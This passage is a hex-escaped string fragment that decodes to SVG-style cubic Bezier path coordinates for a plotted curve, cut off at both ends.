\x31\x30\x32\x39\x39\x39\x36\x31\x20\x31\x30\x2e\x37\x32\x36\x39\
\x31\x37\x36\x33\x36\x35\x20\x43\x20\x31\x31\x2e\x32\x31\x37\x32\
\x37\x31\x30\x36\x35\x20\x31\x30\x2e\x36\x38\x39\x32\x34\x31\x39\
\x35\x35\x34\x20\x31\x31\x2e\x32\x32\x33\x35\x31\x32\x31\x33\x33\
\x38\x20\x31\x30\x2e\x36\x35\x31\x39\x33\x34\x34\x35\x31\x38\x20\
\x31\x31\x2e\x32\x32\x39\x37\x35\x33\x32\x30\x32\x37\x20\x31\x30\
\x2e\x36\x31\x35\x30\x32\x31\x36\x36\x39\x35\x20\x43\x20\x31\x31\
\x2e\x32\x33\x35\x39\x39\x34\x32\x37\x31\x35\x20\x31\x30\x2e\x35\
\x37\x38\x31\x30\x38\x38\x38\x37\x32\x20\x31\x31\x2e\x32\x34\x32\
\x32\x33\x35\x33\x34\x30\x33\x20\x31\x30\x2e\x35\x34\x31\x35\x39\
\x33\x32\x30\x33\x36\x20\x31\x31\x2e\x32\x34\x38\x34\x37\x36\x34\
\x30\x39\x32\x20\x31\x30\x2e\x35\x30\x35\x35\x30\x30\x33\x37\x39\
\x35\x20\x43\x20\x31\x31\x2e\x32\x35\x34\x37\x31\x37\x34\x37\x38\
\x20\x31\x30\x2e\x34\x36\x39\x34\x30\x37\x35\x35\x35\x35\x20\x31\
\x31\x2e\x32\x36\x30\x39\x35\x38\x35\x34\x36\x38\x20\x31\x30\x2e\
\x34\x33\x33\x37\x34\x30\x31\x33\x37\x34\x20\x31\x31\x2e\x32\x36\
\x37\x31\x39\x39\x36\x31\x35\x37\x20\x31\x30\x2e\x33\x39\x38\x35\
\x32\x33\x30\x36\x33\x35\x20\x43\x20\x31\x31\x2e\x32\x37\x33\x34\
\x34\x30\x36\x38\x34\x35\x20\x31\x30\x2e\x33\x36\x33\x33\x30\x35\
\x39\x38\x39\x35\x20\x31\x31\x2e\x32\x37\x39\x36\x38\x31\x37\x35\
\x33\x33\x20\x31\x30\x2e\x33\x32\x38\x35\x34\x31\x39\x37\x31\x34\
\x20\x31\x31\x2e\x32\x38\x35\x39\x32\x32\x38\x32\x32\x32\x20\x31\
\x30\x2e\x32\x39\x34\x32\x35\x35\x30\x38\x35\x37\x20\x43\x20\x31\
\x31\x2e\x32\x39\x32\x31\x36\x33\x38\x39\x31\x20\x31\x30\x2e\x32\
\x35\x39\x39\x36\x38\x32\x20\x31\x31\x2e\x32\x39\x38\x34\x30\x34\
\x39\x35\x39\x38\x20\x31\x30\x2e\x32\x32\x36\x31\x36\x31\x33\x31\
\x39\x36\x20\x31\x31\x2e\x33\x30\x34\x36\x34\x36\x30\x32\x38\x37\
\x20\x31\x30\x2e\x31\x39\x32\x38\x35\x37\x36\x32\x32\x35\x20\x43\
\x20\x31\x31\x2e\x33\x31\x30\x38\x38\x37\x30\x39\x37\x35\x20\x31\
\x30\x2e\x31\x35\x39\x35\x35\x33\x39\x32\x35\x34\x20\x31\x31\x2e\
\x33\x31\x37\x31\x32\x38\x31\x36\x36\x34\x20\x31\x30\x2e\x31\x32\
\x36\x37\x35\x36\x34\x34\x31\x20\x31\x31\x2e\x33\x32\x33\x33\x36\
\x39\x32\x33\x35\x32\x20\x31\x30\x2e\x30\x39\x34\x34\x38\x37\x34\
\x31\x33\x20\x43\x20\x31\x31\x2e\x33\x32\x39\x36\x31\x30\x33\x30\
\x34\x20\x31\x30\x2e\x30\x36\x32\x32\x31\x38\x33\x38\x34\x39\x20\
\x31\x31\x2e\x33\x33\x35\x38\x35\x31\x33\x37\x32\x39\x20\x31\x30\
\x2e\x30\x33\x30\x34\x38\x30\x39\x39\x34\x36\x20\x31\x31\x2e\x33\
\x34\x32\x30\x39\x32\x34\x34\x31\x37\x20\x39\x2e\x39\x39\x39\x32\
\x39\x36\x35\x31\x36\x36\x39\x20\x43\x20\x31\x31\x2e\x33\x34\x38\
\x33\x33\x33\x35\x31\x30\x35\x20\x39\x2e\x39\x36\x38\x31\x31\x32\
\x30\x33\x38\x38\x20\x31\x31\x2e\x33\x35\x34\x35\x37\x34\x35\x37\
\x39\x34\x20\x39\x2e\x39\x33\x37\x34\x38\x33\x38\x30\x31\x38\x32\
\x20\x31\x31\x2e\x33\x36\x30\x38\x31\x35\x36\x34\x38\x32\x20\x39\
\x2e\x39\x30\x37\x34\x33\x32\x30\x37\x38\x37\x33\x20\x43\x20\x31\
\x31\x2e\x33\x36\x37\x30\x35\x36\x37\x31\x37\x20\x39\x2e\x38\x37\
\x37\x33\x38\x30\x33\x35\x35\x36\x34\x20\x31\x31\x2e\x33\x37\x33\
\x32\x39\x37\x37\x38\x35\x39\x20\x39\x2e\x38\x34\x37\x39\x30\x38\
\x36\x31\x36\x38\x20\x31\x31\x2e\x33\x37\x39\x35\x33\x38\x38\x35\
\x34\x37\x20\x39\x2e\x38\x31\x39\x30\x33\x36\x31\x30\x32\x31\x32\
\x20\x43\x20\x31\x31\x2e\x33\x38\x35\x37\x37\x39\x39\x32\x33\x36\
\x20\x39\x2e\x37\x39\x30\x31\x36\x33\x35\x38\x37\x34\x35\x20\x31\
\x31\x2e\x33\x39\x32\x30\x32\x30\x39\x39\x32\x34\x20\x39\x2e\x37\
\x36\x31\x38\x39\x33\x39\x30\x33\x38\x34\x20\x31\x31\x2e\x33\x39\
\x38\x32\x36\x32\x30\x36\x31\x32\x20\x39\x2e\x37\x33\x34\x32\x34\
\x35\x32\x32\x38\x34\x31\x20\x43\x20\x31\x31\x2e\x34\x30\x34\x35\
\x30\x33\x31\x33\x30\x31\x20\x39\x2e\x37\x30\x36\x35\x39\x36\x35\
\x35\x32\x39\x38\x20\x31\x31\x2e\x34\x31\x30\x37\x34\x34\x31\x39\
\x38\x39\x20\x39\x2e\x36\x37\x39\x35\x37\x32\x36\x32\x33\x35\x37\
\x20\x31\x31\x2e\x34\x31\x36\x39\x38\x35\x32\x36\x37\x37\x20\x39\
\x2e\x36\x35\x33\x31\x39\x30\x35\x32\x36\x33\x39\x20\x43\x20\x31\
\x31\x2e\x34\x32\x33\x32\x32\x36\x33\x33\x36\x36\x20\x39\x2e\x36\
\x32\x36\x38\x30\x38\x34\x32\x39\x32\x32\x20\x31\x31\x2e\x34\x32\
\x39\x34\x36\x37\x34\x30\x35\x34\x20\x39\x2e\x36\x30\x31\x30\x37\
\x32\x30\x32\x37\x33\x31\x20\x31\x31\x2e\x34\x33\x35\x37\x30\x38\
\x34\x37\x34\x32\x20\x39\x2e\x35\x37\x35\x39\x39\x37\x32\x38\x39\
\x35\x35\x20\x43\x20\x31\x31\x2e\x34\x34\x31\x39\x34\x39\x35\x34\
\x33\x31\x20\x39\x2e\x35\x35\x30\x39\x32\x32\x35\x35\x31\x37\x39\
\x20\x31\x31\x2e\x34\x34\x38\x31\x39\x30\x36\x31\x31\x39\x20\x39\
\x2e\x35\x32\x36\x35\x31\x33\x34\x36\x30\x34\x32\x20\x31\x31\x2e\
\x34\x35\x34\x34\x33\x31\x36\x38\x30\x38\x20\x39\x2e\x35\x30\x32\
\x37\x38\x34\x38\x34\x32\x33\x34\x20\x43\x20\x31\x31\x2e\x34\x36\
\x30\x36\x37\x32\x37\x34\x39\x36\x20\x39\x2e\x34\x37\x39\x30\x35\
\x36\x32\x32\x34\x32\x35\x20\x31\x31\x2e\x34\x36\x36\x39\x31\x33\
\x38\x31\x38\x34\x20\x39\x2e\x34\x35\x36\x30\x31\x32\x31\x37\x34\
\x37\x34\x20\x31\x31\x2e\x34\x37\x33\x31\x35\x34\x38\x38\x37\x33\
\x20\x39\x2e\x34\x33\x33\x36\x36\x36\x33\x35\x35\x37\x36\x20\x43\
\x20\x31\x31\x2e\x34\x37\x39\x33\x39\x35\x39\x35\x36\x31\x20\x39\
\x2e\x34\x31\x31\x33\x32\x30\x35\x33\x36\x37\x39\x20\x31\x31\x2e\
\x34\x38\x35\x36\x33\x37\x30\x32\x34\x39\x20\x39\x2e\x33\x38\x39\
\x36\x37\x37\x31\x35\x30\x33\x36\x20\x31\x31\x2e\x34\x39\x31\x38\
\x37\x38\x30\x39\x33\x38\x20\x39\x2e\x33\x36\x38\x37\x34\x38\x36\
\x37\x32\x34\x32\x20\x43\x20\x31\x31\x2e\x34\x39\x38\x31\x31\x39\
\x31\x36\x32\x36\x20\x39\x2e\x33\x34\x37\x38\x32\x30\x31\x39\x34\
\x34\x38\x20\x31\x31\x2e\x35\x30\x34\x33\x36\x30\x32\x33\x31\x34\
\x20\x39\x2e\x33\x32\x37\x36\x31\x30\x39\x32\x37\x32\x36\x20\x31\
\x31\x2e\x35\x31\x30\x36\x30\x31\x33\x30\x30\x33\x20\x39\x2e\x33\
\x30\x38\x31\x33\x32\x31\x34\x31\x33\x37\x20\x43\x20\x31\x31\x2e\
\x35\x31\x36\x38\x34\x32\x33\x36\x39\x31\x20\x39\x2e\x32\x38\x38\
\x36\x35\x33\x33\x35\x35\x34\x37\x20\x31\x31\x2e\x35\x32\x33\x30\
\x38\x33\x34\x33\x37\x39\x20\x39\x2e\x32\x36\x39\x39\x30\x39\x34\
\x34\x36\x37\x32\x20\x31\x31\x2e\x35\x32\x39\x33\x32\x34\x35\x30\
\x36\x38\x20\x39\x2e\x32\x35\x31\x39\x31\x30\x34\x36\x32\x39\x37\
\x20\x43\x20\x31\x31\x2e\x35\x33\x35\x35\x36\x35\x35\x37\x35\x36\
\x20\x39\x2e\x32\x33\x33\x39\x31\x31\x34\x37\x39\x32\x31\x20\x31\
\x31\x2e\x35\x34\x31\x38\x30\x36\x36\x34\x34\x35\x20\x39\x2e\x32\
\x31\x36\x36\x36\x31\x39\x30\x33\x30\x35\x20\x31\x31\x2e\x35\x34\
\x38\x30\x34\x37\x37\x31\x33\x33\x20\x39\x2e\x32\x30\x30\x31\x37\
\x30\x35\x34\x34\x30\x37\x20\x43\x20\x31\x31\x2e\x35\x35\x34\x32\
\x38\x38\x37\x38\x32\x31\x20\x39\x2e\x31\x38\x33\x36\x37\x39\x31\
\x38\x35\x31\x20\x31\x31\x2e\x35\x36\x30\x35\x32\x39\x38\x35\x31\
\x20\x39\x2e\x31\x36\x37\x39\x35\x30\x36\x30\x35\x37\x34\x20\x31\
\x31\x2e\x35\x36\x36\x37\x37\x30\x39\x31\x39\x38\x20\x39\x2e\x31\
\x35\x32\x39\x39\x32\x33\x36\x33\x37\x20\x43\x20\x31\x31\x2e\x35\
\x37\x33\x30\x31\x31\x39\x38\x38\x36\x20\x39\x2e\x31\x33\x38\x30\
\x33\x34\x31\x32\x31\x36\x35\x20\x31\x31\x2e\x35\x37\x39\x32\x35\
\x33\x30\x35\x37\x35\x20\x39\x2e\x31\x32\x33\x38\x35\x30\x38\x35\
\x32\x31\x36\x20\x31\x31\x2e\x35\x38\x35\x34\x39\x34\x31\x32\x36\
\x33\x20\x39\x2e\x31\x31\x30\x34\x34\x38\x38\x34\x39\x33\x35\x20\
\x43\x20\x31\x31\x2e\x35\x39\x31\x37\x33\x35\x31\x39\x35\x31\x20\
\x39\x2e\x30\x39\x37\x30\x34\x36\x38\x34\x36\x35\x33\x20\x31\x31\
\x2e\x35\x39\x37\x39\x37\x36\x32\x36\x34\x20\x39\x2e\x30\x38\x34\
\x34\x33\x30\x38\x31\x31\x32\x35\x20\x31\x31\x2e\x36\x30\x34\x32\
\x31\x37\x33\x33\x32\x38\x20\x39\x2e\x30\x37\x32\x36\x30\x35\x37\
\x36\x34\x33\x32\x20\x43\x20\x31\x31\x2e\x36\x31\x30\x34\x35\x38\
\x34\x30\x31\x37\x20\x39\x2e\x30\x36\x30\x37\x38\x30\x37\x31\x37\
\x34\x20\x31\x31\x2e\x36\x31\x36\x36\x39\x39\x34\x37\x30\x35\x20\
\x39\x2e\x30\x34\x39\x37\x35\x31\x34\x31\x38\x30\x36\x20\x31\x31\
\x2e\x36\x32\x32\x39\x34\x30\x35\x33\x39\x33\x20\x39\x2e\x30\x33\
\x39\x35\x32\x31\x36\x30\x36\x30\x36\x20\x43\x20\x31\x31\x2e\x36\
\x32\x39\x31\x38\x31\x36\x30\x38\x32\x20\x39\x2e\x30\x32\x39\x32\
\x39\x31\x37\x39\x34\x30\x35\x20\x31\x31\x2e\x36\x33\x35\x34\x32\
\x32\x36\x37\x37\x20\x39\x2e\x30\x31\x39\x38\x36\x36\x32\x37\x39\
\x36\x33\x20\x31\x31\x2e\x36\x34\x31\x36\x36\x33\x37\x34\x35\x38\
\x20\x39\x2e\x30\x31\x31\x32\x34\x37\x35\x31\x35\x36\x38\x20\x43\
\x20\x31\x31\x2e\x36\x34\x37\x39\x30\x34\x38\x31\x34\x37\x20\x39\
\x2e\x30\x30\x32\x36\x32\x38\x37\x35\x31\x37\x33\x20\x31\x31\x2e\
\x36\x35\x34\x31\x34\x35\x38\x38\x33\x35\x20\x38\x2e\x39\x39\x34\
\x38\x32\x31\x35\x39\x32\x30\x37\x20\x31\x31\x2e\x36\x36\x30\x33\
\x38\x36\x39\x35\x32\x33\x20\x38\x2e\x39\x38\x37\x38\x32\x37\x31\
\x39\x38\x39\x37\x20\x43\x20\x31\x31\x2e\x36\x36\x36\x36\x32\x38\
\x30\x32\x31\x32\x20\x38\x2e\x39\x38\x30\x38\x33\x32\x38\x30\x35\
\x38\x36\x20\x31\x31\x2e\x36\x37\x32\x38\x36\x39\x30\x39\x20\x38\
\x2e\x39\x37\x34\x36\x35\x36\x30\x36\x39\x32\x20\x31\x31\x2e\x36\
\x37\x39\x31\x31\x30\x31\x35\x38\x38\x20\x38\x2e\x39\x36\x39\x32\
\x39\x36\x38\x35\x38\x37\x39\x20\x43\x20\x31\x31\x2e\x36\x38\x35\
\x33\x35\x31\x32\x32\x37\x37\x20\x38\x2e\x39\x36\x33\x39\x33\x37\
\x36\x34\x38\x33\x39\x20\x31\x31\x2e\x36\x39\x31\x35\x39\x32\x32\
\x39\x36\x35\x20\x38\x2e\x39\x35\x39\x34\x30\x30\x38\x38\x32\x36\
\x35\x20\x31\x31\x2e\x36\x39\x37\x38\x33\x33\x33\x36\x35\x34\x20\
\x38\x2e\x39\x35\x35\x36\x38\x35\x31\x33\x39\x31\x35\x20\x43\x20\
\x31\x31\x2e\x37\x30\x34\x30\x37\x34\x34\x33\x34\x32\x20\x38\x2e\
\x39\x35\x31\x39\x36\x39\x33\x39\x35\x36\x35\x20\x31\x31\x2e\x37\
\x31\x30\x33\x31\x35\x35\x30\x33\x20\x38\x2e\x39\x34\x39\x30\x37\
\x39\x36\x31\x33\x37\x32\x20\x31\x31\x2e\x37\x31\x36\x35\x35\x36\
\x35\x37\x31\x39\x20\x38\x2e\x39\x34\x37\x30\x31\x33\x30\x38\x30\
\x38\x39\x20\x43\x20\x31\x31\x2e\x37\x32\x32\x37\x39\x37\x36\x34\
\x30\x37\x20\x38\x2e\x39\x34\x34\x39\x34\x36\x35\x34\x38\x30\x36\
\x20\x31\x31\x2e\x37\x32\x39\x30\x33\x38\x37\x30\x39\x35\x20\x38\
\x2e\x39\x34\x33\x37\x30\x38\x32\x31\x36\x39\x33\x20\x31\x31\x2e\
\x37\x33\x35\x32\x37\x39\x37\x37\x38\x34\x20\x38\x2e\x39\x34\x33\
\x32\x39\x34\x30\x38\x39\x31\x38\x20\x43\x20\x31\x31\x2e\x37\x34\
\x31\x35\x32\x30\x38\x34\x37\x32\x20\x38\x2e\x39\x34\x32\x38\x37\
\x39\x39\x36\x31\x34\x34\x20\x31\x31\x2e\x37\x34\x37\x37\x36\x31\
\x39\x31\x36\x20\x38\x2e\x39\x34\x33\x32\x39\x34\x39\x39\x35\x33\
\x31\x20\x31\x31\x2e\x37\x35\x34\x30\x30\x32\x39\x38\x34\x39\x20\
\x38\x2e\x39\x34\x34\x35\x33\x33\x39\x31\x32\x38\x31\x20\x43\x20\
\x31\x31\x2e\x37\x36\x30\x32\x34\x34\x30\x35\x33\x37\x20\x38\x2e\
\x39\x34\x35\x37\x37\x32\x38\x33\x30\x33\x31\x20\x31\x31\x2e\x37\
\x36\x36\x34\x38\x35\x31\x32\x32\x36\x20\x38\x2e\x39\x34\x37\x38\
\x34\x30\x35\x38\x37\x36\x32\x20\x31\x31\x2e\x37\x37\x32\x37\x32\
\x36\x31\x39\x31\x34\x20\x38\x2e\x39\x35\x30\x37\x33\x30\x36\x33\
\x35\x32\x36\x20\x43\x20\x31\x31\x2e\x37\x37\x38\x39\x36\x37\x32\
\x36\x30\x32\x20\x38\x2e\x39\x35\x33\x36\x32\x30\x36\x38\x32\x39\
\x20\x31\x31\x2e\x37\x38\x35\x32\x30\x38\x33\x32\x39\x31\x20\x38\
\x2e\x39\x35\x37\x33\x33\x37\x39\x36\x37\x33\x34\x20\x31\x31\x2e\
\x37\x39\x31\x34\x34\x39\x33\x39\x37\x39\x20\x38\x2e\x39\x36\x31\
\x38\x37\x34\x36\x37\x37\x37\x31\x20\x43\x20\x31\x31\x2e\x37\x39\
\x37\x36\x39\x30\x34\x36\x36\x37\x20\x38\x2e\x39\x36\x36\x34\x31\
\x31\x33\x38\x38\x30\x39\x20\x31\x31\x2e\x38\x30\x33\x39\x33\x31\
\x35\x33\x35\x36\x20\x38\x2e\x39\x37\x31\x37\x37\x32\x34\x35\x33\
\x35\x31\x20\x31\x31\x2e\x38\x31\x30\x31\x37\x32\x36\x30\x34\x34\
\x20\x38\x2e\x39\x37\x37\x39\x34\x38\x38\x31\x33\x38\x33\x20\x43\
\x20\x31\x31\x2e\x38\x31\x36\x34\x31\x33\x36\x37\x33\x32\x20\x38\
\x2e\x39\x38\x34\x31\x32\x35\x31\x37\x34\x31\x34\x20\x31\x31\x2e\
\x38\x32\x32\x36\x35\x34\x37\x34\x32\x31\x20\x38\x2e\x39\x39\x31\
\x31\x32\x31\x37\x33\x33\x34\x37\x20\x31\x31\x2e\x38\x32\x38\x38\
\x39\x35\x38\x31\x30\x39\x20\x38\x2e\x39\x39\x38\x39\x32\x38\x31\
\x39\x36\x33\x37\x20\x43\x20\x31\x31\x2e\x38\x33\x35\x31\x33\x36\
\x38\x37\x39\x37\x20\x39\x2e\x30\x30\x36\x37\x33\x34\x36\x35\x39\
\x32\x37\x20\x31\x31\x2e\x38\x34\x31\x33\x37\x37\x39\x34\x38\x36\
\x20\x39\x2e\x30\x31\x35\x33\x35\x35\x38\x39\x37\x33\x32\x20\x31\
\x31\x2e\x38\x34\x37\x36\x31\x39\x30\x31\x37\x34\x20\x39\x2e\x30\
\x32\x34\x37\x38\x30\x33\x39\x35\x36\x36\x20\x43\x20\x31\x31\x2e\
\x38\x35\x33\x38\x36\x30\x30\x38\x36\x33\x20\x39\x2e\x30\x33\x34\
\x32\x30\x34\x38\x39\x34\x20\x31\x31\x2e\x38\x36\x30\x31\x30\x31\
\x31\x35\x35\x31\x20\x39\x2e\x30\x34\x34\x34\x33\x37\x34\x38\x34\
\x31\x33\x20\x31\x31\x2e\x38\x36\x36\x33\x34\x32\x32\x32\x33\x39\
\x20\x39\x2e\x30\x35\x35\x34\x36\x35\x34\x34\x39\x36\x33\x20\x43\
\x20\x31\x31\x2e\x38\x37\x32\x35\x38\x33\x32\x39\x32\x38\x20\x39\
\x2e\x30\x36\x36\x34\x39\x33\x34\x31\x35\x31\x33\x20\x31\x31\x2e\
\x38\x37\x38\x38\x32\x34\x33\x36\x31\x36\x20\x39\x2e\x30\x37\x38\
\x33\x32\x31\x35\x33\x39\x39\x33\x20\x31\x31\x2e\x38\x38\x35\x30\
\x36\x35\x34\x33\x30\x34\x20\x39\x2e\x30\x39\x30\x39\x33\x35\x39\
\x32\x35\x36\x37\x20\x43\x20\x31\x31\x2e\x38\x39\x31\x33\x30\x36\
\x34\x39\x39\x33\x20\x39\x2e\x31\x30\x33\x35\x35\x30\x33\x31\x31\
\x34\x31\x20\x31\x31\x2e\x38\x39\x37\x35\x34\x37\x35\x36\x38\x31\
\x20\x39\x2e\x31\x31\x36\x39\x35\x35\x36\x38\x37\x30\x39\x20\x31\
\x31\x2e\x39\x30\x33\x37\x38\x38\x36\x33\x36\x39\x20\x39\x2e\x31\
\x33\x31\x31\x33\x36\x39\x39\x33\x39\x20\x43\x20\x31\x31\x2e\x39\
\x31\x30\x30\x32\x39\x37\x30\x35\x38\x20\x39\x2e\x31\x34\x35\x33\
\x31\x38\x33\x30\x30\x37\x31\x20\x31\x31\x2e\x39\x31\x36\x32\x37\
\x30\x37\x37\x34\x36\x20\x39\x2e\x31\x36\x30\x32\x38\x30\x32\x30\
\x35\x33\x39\x20\x31\x31\x2e\x39\x32\x32\x35\x31\x31\x38\x34\x33\
\x35\x20\x39\x2e\x31\x37\x36\x30\x30\x36\x35\x31\x31\x39\x36\x20\
\x43\x20\x31\x31\x2e\x39\x32\x38\x37\x35\x32\x39\x31\x32\x33\x20\
\x39\x2e\x31\x39\x31\x37\x33\x32\x38\x31\x38\x35\x32\x20\x31\x31\
\x2e\x39\x33\x34\x39\x39\x33\x39\x38\x31\x31\x20\x39\x2e\x32\x30\
\x38\x32\x32\x38\x31\x32\x34\x32\x35\x20\x31\x31\x2e\x39\x34\x31\
\x32\x33\x35\x30\x35\x20\x39\x2e\x32\x32\x35\x34\x37\x35\x31\x32\
\x31\x30\x32\x20\x43\x20\x31\x31\x2e\x39\x34\x37\x34\x37\x36\x31\
\x31\x38\x38\x20\x39\x2e\x32\x34\x32\x37\x32\x32\x31\x31\x37\x37\
\x39\x20\x31\x31\x2e\x39\x35\x33\x37\x31\x37\x31\x38\x37\x36\x20\
\x39\x2e\x32\x36\x30\x37\x32\x35\x33\x32\x36\x33\x20\x31\x31\x2e\
\x39\x35\x39\x39\x35\x38\x32\x35\x36\x35\x20\x39\x2e\x32\x37\x39\
\x34\x36\x36\x33\x35\x33\x30\x36\x20\x43\x20\x31\x31\x2e\x39\x36\
\x36\x31\x39\x39\x33\x32\x35\x33\x20\x39\x2e\x32\x39\x38\x32\x30\
\x37\x33\x37\x39\x38\x31\x20\x31\x31\x2e\x39\x37\x32\x34\x34\x30\
\x33\x39\x34\x31\x20\x39\x2e\x33\x31\x37\x36\x39\x30\x36\x36\x31\
\x39\x34\x20\x31\x31\x2e\x39\x37\x38\x36\x38\x31\x34\x36\x33\x20\
\x39\x2e\x33\x33\x37\x38\x39\x36\x37\x34\x39\x30\x31\x20\x43\x20\
\x31\x31\x2e\x39\x38\x34\x39\x32\x32\x35\x33\x31\x38\x20\x39\x2e\
\x33\x35\x38\x31\x30\x32\x38\x33\x36\x30\x38\x20\x31\x31\x2e\x39\
\x39\x31\x31\x36\x33\x36\x30\x30\x37\x20\x39\x2e\x33\x37\x39\x30\
\x33\x36\x30\x37\x34\x37\x38\x20\x31\x31\x2e\x39\x39\x37\x34\x30\
\x34\x36\x36\x39\x35\x20\x39\x2e\x34\x30\x30\x36\x37\x35\x39\x38\
\x37\x38\x31\x20\x43\x20\x31\x32\x2e\x30\x30\x33\x36\x34\x35\x37\
\x33\x38\x33\x20\x39\x2e\x34\x32\x32\x33\x31\x35\x39\x30\x30\x38\
\x34\x20\x31\x32\x2e\x30\x30\x39\x38\x38\x36\x38\x30\x37\x32\x20\
\x39\x2e\x34\x34\x34\x36\x36\x36\x37\x33\x37\x37\x35\x20\x31\x32\
\x2e\x30\x31\x36\x31\x32\x37\x38\x37\x36\x20\x39\x2e\x34\x36\x37\
\x37\x30\x37\x30\x32\x36\x20\x43\x20\x31\x32\x2e\x30\x32\x32\x33\
\x36\x38\x39\x34\x34\x38\x20\x39\x2e\x34\x39\x30\x37\x34\x37\x33\
\x31\x34\x32\x35\x20\x31\x32\x2e\x30\x32\x38\x36\x31\x30\x30\x31\
\x33\x37\x20\x39\x2e\x35\x31\x34\x34\x38\x31\x31\x39\x39\x36\x39\
\x20\x31\x32\x2e\x30\x33\x34\x38\x35\x31\x30\x38\x32\x35\x20\x39\
\x2e\x35\x33\x38\x38\x38\x36\x32\x34\x37\x37\x33\x20\x43\x20\x31\
\x32\x2e\x30\x34\x31\x30\x39\x32\x31\x35\x31\x33\x20\x39\x2e\x35\
\x36\x33\x32\x39\x31\x32\x39\x35\x37\x38\x20\x31\x32\x2e\x30\x34\
\x37\x33\x33\x33\x32\x32\x30\x32\x20\x39\x2e\x35\x38\x38\x33\x37\
\x31\x35\x34\x32\x31\x36\x20\x31\x32\x2e\x30\x35\x33\x35\x37\x34\
\x32\x38\x39\x20\x39\x2e\x36\x31\x34\x31\x30\x33\x36\x32\x34\x39\
\x34\x20\x43\x20\x31\x32\x2e\x30\x35\x39\x38\x31\x35\x33\x35\x37\
\x38\x20\x39\x2e\x36\x33\x39\x38\x33\x35\x37\x30\x37\x37\x32\x20\
\x31\x32\x2e\x30\x36\x36\x30\x35\x36\x34\x32\x36\x37\x20\x39\x2e\
\x36\x36\x36\x32\x32\x33\x35\x34\x36\x32\x38\x20\x31\x32\x2e\x30\
\x37\x32\x32\x39\x37\x34\x39\x35\x35\x20\x39\x2e\x36\x39\x33\x32\
\x34\x32\x38\x38\x37\x34\x32\x20\x43\x20\x31\x32\x2e\x30\x37\x38\
\x35\x33\x38\x35\x36\x34\x34\x20\x39\x2e\x37\x32\x30\x32\x36\x32\
\x32\x32\x38\x35\x37\x20\x31\x32\x2e\x30\x38\x34\x37\x37\x39\x36\
\x33\x33\x32\x20\x39\x2e\x37\x34\x37\x39\x31\x36\x38\x36\x39\x32\
\x37\x20\x31\x32\x2e\x30\x39\x31\x30\x32\x30\x37\x30\x32\x20\x39\
\x2e\x37\x37\x36\x31\x38\x31\x37\x30\x32\x35\x38\x20\x43\x20\x31\
\x32\x2e\x30\x39\x37\x32\x36\x31\x37\x37\x30\x39\x20\x39\x2e\x38\
\x30\x34\x34\x34\x36\x35\x33\x35\x38\x39\x20\x31\x32\x2e\x31\x30\
\x33\x35\x30\x32\x38\x33\x39\x37\x20\x39\x2e\x38\x33\x33\x33\x32\
\x35\x32\x33\x30\x34\x38\x20\x31\x32\x2e\x31\x30\x39\x37\x34\x33\
\x39\x30\x38\x35\x20\x39\x2e\x38\x36\x32\x37\x39\x31\x38\x36\x34\
\x34\x38\x20\x43\x20\x31\x32\x2e\x31\x31\x35\x39\x38\x34\x39\x37\
\x37\x34\x20\x39\x2e\x38\x39\x32\x32\x35\x38\x34\x39\x38\x34\x39\
\x20\x31\x32\x2e\x31\x32\x32\x32\x32\x36\x30\x34\x36\x32\x20\x39\
\x2e\x39\x32\x32\x33\x31\x36\x36\x30\x36\x36\x31\x20\x31\x32\x2e\
\x31\x32\x38\x34\x36\x37\x31\x31\x35\x20\x39\x2e\x39\x35\x32\x39\
\x33\x39\x34\x39\x32\x31\x20\x43\x20\x31\x32\x2e\x31\x33\x34\x37\
\x30\x38\x31\x38\x33\x39\x20\x39\x2e\x39\x38\x33\x35\x36\x32\x33\
\x37\x37\x36\x20\x31\x32\x2e\x31\x34\x30\x39\x34\x39\x32\x35\x32\
\x37\x20\x31\x30\x2e\x30\x31\x34\x37\x35\x33\x34\x33\x35\x37\x20\
\x31\x32\x2e\x31\x34\x37\x31\x39\x30\x33\x32\x31\x36\x20\x31\x30\
\x2e\x30\x34\x36\x34\x38\x35\x32\x33\x36\x32\x20\x43\x20\x31\x32\
\x2e\x31\x35\x33\x34\x33\x31\x33\x39\x30\x34\x20\x31\x30\x2e\x30\
\x37\x38\x32\x31\x37\x30\x33\x36\x37\x20\x31\x32\x2e\x31\x35\x39\
\x36\x37\x32\x34\x35\x39\x32\x20\x31\x30\x2e\x31\x31\x30\x34\x39\
\x32\x38\x33\x30\x31\x20\x31\x32\x2e\x31\x36\x35\x39\x31\x33\x35\
\x32\x38\x31\x20\x31\x30\x2e\x31\x34\x33\x32\x38\x34\x34\x39\x34\
\x38\x20\x43\x20\x31\x32\x2e\x31\x37\x32\x31\x35\x34\x35\x39\x36\
\x39\x20\x31\x30\x2e\x31\x37\x36\x30\x37\x36\x31\x35\x39\x36\x20\
\x31\x32\x2e\x31\x37\x38\x33\x39\x35\x36\x36\x35\x37\x20\x31\x30\
\x2e\x32\x30\x39\x33\x38\x36\x37\x39\x36\x36\x20\x31\x32\x2e\x31\
\x38\x34\x36\x33\x36\x37\x33\x34\x36\x20\x31\x30\x2e\x32\x34\x33\
\x31\x38\x37\x36\x33\x36\x37\x20\x43\x20\x31\x32\x2e\x31\x39\x30\
\x38\x37\x37\x38\x30\x33\x34\x20\x31\x30\x2e\x32\x37\x36\x39\x38\
\x38\x34\x37\x36\x38\x20\x31\x32\x2e\x31\x39\x37\x31\x31\x38\x38\
\x37\x32\x32\x20\x31\x30\x2e\x33\x31\x31\x32\x38\x32\x34\x36\x36\
\x33\x20\x31\x32\x2e\x32\x30\x33\x33\x35\x39\x39\x34\x31\x31\x20\
\x31\x30\x2e\x33\x34\x36\x30\x34\x30\x32\x33\x32\x37\x20\x43\x20\
\x31\x32\x2e\x32\x30\x39\x36\x30\x31\x30\x30\x39\x39\x20\x31\x30\
\x2e\x33\x38\x30\x37\x39\x37\x39\x39\x39\x31\x20\x31\x32\x2e\x32\
\x31\x35\x38\x34\x32\x30\x37\x38\x37\x20\x31\x30\x2e\x34\x31\x36\
\x30\x32\x32\x33\x32\x39\x37\x20\x31\x32\x2e\x32\x32\x32\x30\x38\
\x33\x31\x34\x37\x36\x20\x31\x30\x2e\x34\x35\x31\x36\x38\x33\x32\
\x39\x34\x33\x20\x43\x20\x31\x32\x2e\x32\x32\x38\x33\x32\x34\x32\
\x31\x36\x34\x20\x31\x30\x2e\x34\x38\x37\x33\x34\x34\x32\x35\x38\
\x38\x20\x31\x32\x2e\x32\x33\x34\x35\x36\x35\x32\x38\x35\x33\x20\
\x31\x30\x2e\x35\x32\x33\x34\x34\x34\x34\x38\x31\x33\x20\x31\x32\
